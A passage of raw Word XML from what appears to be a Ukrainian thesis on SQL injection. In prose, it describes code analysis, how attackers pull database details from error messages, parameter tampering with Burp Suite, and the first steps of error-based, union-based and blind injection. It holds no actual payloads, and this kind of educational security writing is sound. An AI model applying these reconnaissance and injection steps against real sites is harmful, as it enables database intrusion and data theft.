          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2008 і тд., можуть виконати огляд вихідного коду. Це також можна зробити вручну.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F387144" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Існує два основних типи огляду вихідного коду:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E3B6F" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0068107F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Static Code Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Статичний</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>аналіз</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>коду</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Цей тип аналізу вихідного коду виконується для виявлення можливих вразливостей у вихідному коді, коли код не виконується, тобто статичний. Статичний код виконується використовуючи техніку таку як </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Taint</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Є багато автоматизованих інструментів доступних, що можуть виконати статичний аналіз коду.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411AE35F" w14:textId="413E427C" w:rsidR="00A419FD" w:rsidRPr="008B0B5B" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="0068107F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. В аналізі динамічного коду, початковий код додатку аналізується впродовж виконання коду. Аналіз проводиться через кроки, що включають приготування введення даних, запускаючи тестову програму і збору необхідних параметрів, і аналізуючи вихідні дані. Аналіз динамічного коду здатний виявляти SQL-ін’єкцію, що виникли за рахунок взаємодії з кодом бази даних SQL, веб сервісів і тд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C896C7C" w14:textId="0049BDD5" w:rsidR="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28044156" w14:textId="28D048BE" w:rsidR="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008945BB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc30433121"/>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.5.4 Збір інформації через повідомлення про помилку</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="59836AAD" w14:textId="1AA38FC4" w:rsidR="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4315EC" w14:textId="77777777" w:rsidR="008B0B5B" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>В деяких техніках SQL ін’єкцій атакуючий примушує додаток генерувати повідомлення про помилку. Якщо розробники використовують генерацію повідомлень про помилку для їхніх додатків, вони можуть надати корисну інформацію для атакуючого. У відповідь на введення атакуючого, база даних може генерувати повідомлення про помилку в синтаксисі, і тд. Повідомлення про помилку можу включати інформацію про ОС, тип бази даних, версію бази даних, рівень доступу, рівень взаємодії ОС, і тд. Базуючись на типу інформації отриманої з повідомлення про помилку, атакуючий вибирає техніку SQL ін’єкції для експлуатації вразливості в додатку. Атакуючий може отримати інформацію з повідомлення про помилку через різні техніки по збору інформації.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ACCD2F" w14:textId="77777777" w:rsidR="008B0B5B" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Атакуючий може використовувати наступні методи для добування інформації через повідомлення про помилку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D3FEA" w14:textId="70215957" w:rsidR="008B0B5B" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Parameter Tampering(фальсифікація параметрів). Атакуючий може спотворити HTTP GET і POST запити для генерації помилок. Інструменти Tamper Data I Burp Suite інструменти можуть маніпулювати GET і POST запитами. Використовуючи отримане повідомлення про помилку атакуючий отримує інформацію таку як ім’я сервера бази даних, структуру директорії, і функції що використовуються для SQL запитів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7437F" w14:textId="3899A7D0" w:rsidR="008B0B5B" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Determining Database Engine Type(Визначення типу движка баз даних). Визначення типу движка баз даних є основою для продовження атаки ін'єкції. Одним з найпростіших шляхів визначення типу движка це генерація ODBC помилки. ODBC помилки виявляють тип движка який використовується, або допомогти атакуючому здогадатися і виявити який тип движка може використовувати додаток. Атакуючий який не в змозі отримати ODBC помилку може зробити обґрунтоване припущення про тип движка, базуючись на використанні ОС і веб сервера. Помилка ODBC відображає тип бази даних як частину інформації про драйвер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04D754" w14:textId="2D5E19CB" w:rsidR="008B0B5B" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Determining a SELECT Query Structure(Визначення структури запиту SELECT). Разом з повідомленням про помилку, атакуючий може видобути структуру запиту, що використовується в додатку. Це дозволить атакуючому сконструювати зловмисний запит щоб отримати контроль над справжнім запитом. Отримавши структуру справжнього запиту, атакуючий примушує додаток генерувати помилку, що виявляє інформацію таку як ім’я таблиць, ім’я стовпця, і тип даних. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF0994" w14:textId="2DC57986" w:rsidR="008B0B5B" w:rsidRPr="008B0B5B" w:rsidRDefault="008B0B5B" w:rsidP="008B0B5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0B5B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Атакуючий використовує рівень помилки бази даних, що генеруються додатком. Це дуже корисно для створення запиту на використання вразливості. Це навіть шанс створити автоматизований експлойт, в залежності від помилки, що генерується сервером баз даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F918961" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="002B7D87" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D502E39" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0088399F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc516752137"/>
      <w:bookmarkStart w:id="66" w:name="_Toc30433122"/>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6 Початок атаки SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкції</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="180A0E56" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D4B39C" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На етапі збору інформації, атакуючий намагається зібрати інформацію про базу даних таку як: ім’я бази даних, версію, користувачів, механізм виведення, тип БД і рівень взаємодії з ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB549D" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00D84A48" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Як тільки інформація зібрана, атакуючий намаг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ається шукати вразливості в веб-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>додатку. Для цього атакуючий перераховує всі поля введення, приховані поля і post</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>запити на веб сайті а потім спробує ввести код у поля введення, щоб створити помилку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA0F4A" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакуючий намагається тоді виконати різні типи атак </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> такі як </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08439EBD" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00101F0F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252D70A2" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="0088399F" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc516752138"/>
      <w:bookmarkStart w:id="68" w:name="_Toc30433123"/>
      <w:r w:rsidRPr="0088399F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.6.1 Виконання UNION SQL-ін’єкції</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="5B46C4A0" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRPr="00995DF9" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F21CCB" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60315">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, атакуючий використовує UNION для об’єднання зловмисного запиту з оригінальним запитом, щоб витягнути результат з таблиці бази даних. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17477C74" w14:textId="77777777" w:rsidR="00A419FD" w:rsidRDefault="00A419FD" w:rsidP="00A419FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
